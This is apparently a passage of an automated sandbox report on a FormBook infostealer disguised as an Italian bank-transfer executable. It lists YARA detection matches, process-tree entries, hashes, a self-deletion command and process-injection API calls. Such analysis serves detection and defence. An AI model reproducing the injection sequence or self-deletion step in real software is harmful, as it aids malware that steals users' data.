                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:7
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff611de0000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:10:14:15
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\control.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\control.exe"
                                Imagebase:0x220000
                                File size:149'504 bytes
                                MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                Target ID:9
                                Start time:10:14:18
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0xc30000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:10:14:18
                                Start date:21/06/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff68cce0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:9.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:2.1%
                                  Total number of Nodes:195
                                  Total number of Limit Nodes:10

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p$$p$$p
                                  • API String ID: 0-1202566845
                                  • Opcode ID: d7f449480b625bde52c20a2f9b543bdf879301b4dbf99059a86f6cca88d5dafa
                                  • Instruction ID: 9177f37abceffa0ed967dd90742e5c7a68bcc36278a8b2f90b51fb6bac18108e
                                  • Opcode Fuzzy Hash: d7f449480b625bde52c20a2f9b543bdf879301b4dbf99059a86f6cca88d5dafa
                                  • Instruction Fuzzy Hash: D1221874E05218DFEB58CFA5D99479EBBF2FB89300F10D4AAD509AB294DB309941CF14

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: 52f1b1eabc56fbf7d24fed510a7739b4ba7fe25d0b82279a351f0b2afe43c2eb
                                  • Instruction ID: 28efc63d8f34839a9a0a7060d3b462ae2fc2980f117f9843c2bb1908f0348f42
                                  • Opcode Fuzzy Hash: 52f1b1eabc56fbf7d24fed510a7739b4ba7fe25d0b82279a351f0b2afe43c2eb
                                  • Instruction Fuzzy Hash: 3D121874E05218DFEB58CFA5D99479EBBF2BB89300F10D4AAD509B7254EB309A41CF14

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: e2e82d02acaa3c9afb871e0a53a30d6b8349d1f8e4f1847d80f21e4e03be6e8e
                                  • Instruction ID: c793a1d5004e44f8be015f5d6bc6b2b1f782295c57a865a5c46545a257a67eaa
                                  • Opcode Fuzzy Hash: e2e82d02acaa3c9afb871e0a53a30d6b8349d1f8e4f1847d80f21e4e03be6e8e
                                  • Instruction Fuzzy Hash: B7A1E774E05318DFEB58CFA5D99479EBBB2FB89310F1080AAD509AB354DB309A81CF54

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: 5b0370a5c1f392a0b5e0c0e2070f4e78d76c1b821a7d6761f5540feac048fe84
                                  • Instruction ID: ba2f6ec5589efc1e608b79d3c49098f2dece97113f5d4022931a9068fad2d07f
                                  • Opcode Fuzzy Hash: 5b0370a5c1f392a0b5e0c0e2070f4e78d76c1b821a7d6761f5540feac048fe84
                                  • Instruction Fuzzy Hash: DCA1F674E05318DFEB58CFA5D99479EBBB2FB89310F1080AAD509AB354DB309A81CF54

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: da95df3e6b336fe2f8966929f714bbc906ca201101f07840a844a5800f22a3ad
                                  • Instruction ID: edd2bba5cc47def07218763d9974022aef2ec70cbce8fcd7107ece4811a749cd
                                  • Opcode Fuzzy Hash: da95df3e6b336fe2f8966929f714bbc906ca201101f07840a844a5800f22a3ad
                                  • Instruction Fuzzy Hash: 3C91E574E05218CFEB58CFA5D994B9DBBB2FF89310F1081AAD509AB354DB309A81CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp$LRp$LRp$LRp$$p$$p
                                  • API String ID: 0-939497509
                                  • Opcode ID: 8c3048ba51460cd8a669f3bc80daae3521e3a50a2de0a934ec0bd1dc3a9d72d4
                                  • Instruction ID: 40db0fb8519660c401f941e58bdb7afb7c689cf27461e07a8f198cbc0630245a
                                  • Opcode Fuzzy Hash: 8c3048ba51460cd8a669f3bc80daae3521e3a50a2de0a934ec0bd1dc3a9d72d4
                                  • Instruction Fuzzy Hash: FF71D032E04115CFFB989B5AC850BBDBBF2EB44310F1480AAD555AB2D1E774EA41CBB1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: lk^$lk^$lk^$lk^$lk^
                                  • API String ID: 0-3594332490
                                  • Opcode ID: bbee4e1e8a26e03f64a26e1e7898b11c02e0369ac1bc54bd0bc954c6cdf220dc
                                  • Instruction ID: c6e5672fad3ee6c8618549216ca439472b3f03f3a8279940742a1a4c7cc43ec3
                                  • Opcode Fuzzy Hash: bbee4e1e8a26e03f64a26e1e7898b11c02e0369ac1bc54bd0bc954c6cdf220dc
                                  • Instruction Fuzzy Hash: 1911A7A39093C94FF3255A195C9439D7F96AF35381F05405385E08B1E3F626581EC747

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp$LRp$$p
                                  • API String ID: 0-2783056526
                                  • Opcode ID: a89187f89735b1c49250ffb5710bd1c2d951bc8711cc86673aa28f4121cd4d1a
                                  • Instruction ID: ddf20f83435acebd99c47abcab5fc68663a74111a0d793ba6567dcaaaac1d807
                                  • Opcode Fuzzy Hash: a89187f89735b1c49250ffb5710bd1c2d951bc8711cc86673aa28f4121cd4d1a
                                  • Instruction Fuzzy Hash: B761C032E04115CFFB989B5AC850BBD7BB1EB44311F0881AAD555AB2D2E374EA41CBB1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B524E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B524E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C95DC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C95DC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B4E20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B4E20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B4C76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C9E98E,?,?,?,?,?), ref: 00C9EA4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B4F00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B4F00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B4C76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B4D3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C9C7C1,00000800,00000000,00000000), ref: 00C9C9D2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B4D3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073B7E15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00C9C746
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073B7E15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: V
                                  • API String ID: 0-1342839628
                                  • Opcode ID: 414b504f220aea896f4f8e2273bc8c45d091ed1e0b9ed9eacb73575fa291c1cc
                                  • Instruction ID: 741169f3404c1c6a8839674760fdf5d5c83c868780ef1cab241d262222632f70
                                  • Opcode Fuzzy Hash: 414b504f220aea896f4f8e2273bc8c45d091ed1e0b9ed9eacb73575fa291c1cc
                                  • Instruction Fuzzy Hash: FD519E70D05215DFFB949F6BC5607BDBAB2AF04301F04806AF466AB6C2C735CAA4DB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: 7cf4511e3a73af7880d76fbdada65cc935a13265ffc74163ff6fe29874f40c79
                                  • Instruction ID: 767d2d731bfe9ded477d1e756c6b39aba7395ae2da8414dcbcf120359e7aa75f
                                  • Opcode Fuzzy Hash: 7cf4511e3a73af7880d76fbdada65cc935a13265ffc74163ff6fe29874f40c79
                                  • Instruction Fuzzy Hash: B1418E75A013098FDB50DFA9C844AEEBBF5EB88310F14846AD915A7381E7719A01CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp
                                  • API String ID: 0-3405495957
                                  • Opcode ID: bae5ba62006c299c3b6c6ac97c90f9050cb2b699390310f091142c53007367e7
                                  • Instruction ID: 83eb3f7bd206d0b823be58c99614687b35bf9497a48888d0bd9141537925ce15
                                  • Opcode Fuzzy Hash: bae5ba62006c299c3b6c6ac97c90f9050cb2b699390310f091142c53007367e7
                                  • Instruction Fuzzy Hash: 29412270E06340DFEB588F69C854AFABBB1AB45301F0880AAE5159B2C2D774A940CBB1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: 96d7d77cbfdd397c73019fdf2fa5ddf64fef3a198a43841f7820335ccb567be0
                                  • Instruction ID: ab7062ae5b729a029e25530b1db985fb1eb0bf0cb4513972b9be3657f6f1baee
                                  • Opcode Fuzzy Hash: 96d7d77cbfdd397c73019fdf2fa5ddf64fef3a198a43841f7820335ccb567be0
                                  • Instruction Fuzzy Hash: 4F119D74D05248AFCB51DFB8C949A9EBFB4AF05310F1041EEE854EB392E6305A81DFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: e122ef7060cc67a729da8e727e2b89160799a1c02d80d134a73f24588e3da9be
                                  • Instruction ID: 4f1dbb22a96fd5bb46a4fd330227dc362c508dd2cf12dcceb3bee61dcbfc4490
                                  • Opcode Fuzzy Hash: e122ef7060cc67a729da8e727e2b89160799a1c02d80d134a73f24588e3da9be
                                  • Instruction Fuzzy Hash: C4114F31F122098BDF94EBB998106FFB6B6AF94350B504069C504E7384EB318E01CBA1
                                  • Instruction ID: d8be7e9c48dd05f6817a0bd5b6607ff4f1d0ccafc22db0492a7280b2c802ee58
                                  • Opcode Fuzzy Hash: c255148429b580be9f85350732170a1d2d55d21ea187d20a70fe3254a6ad9f05
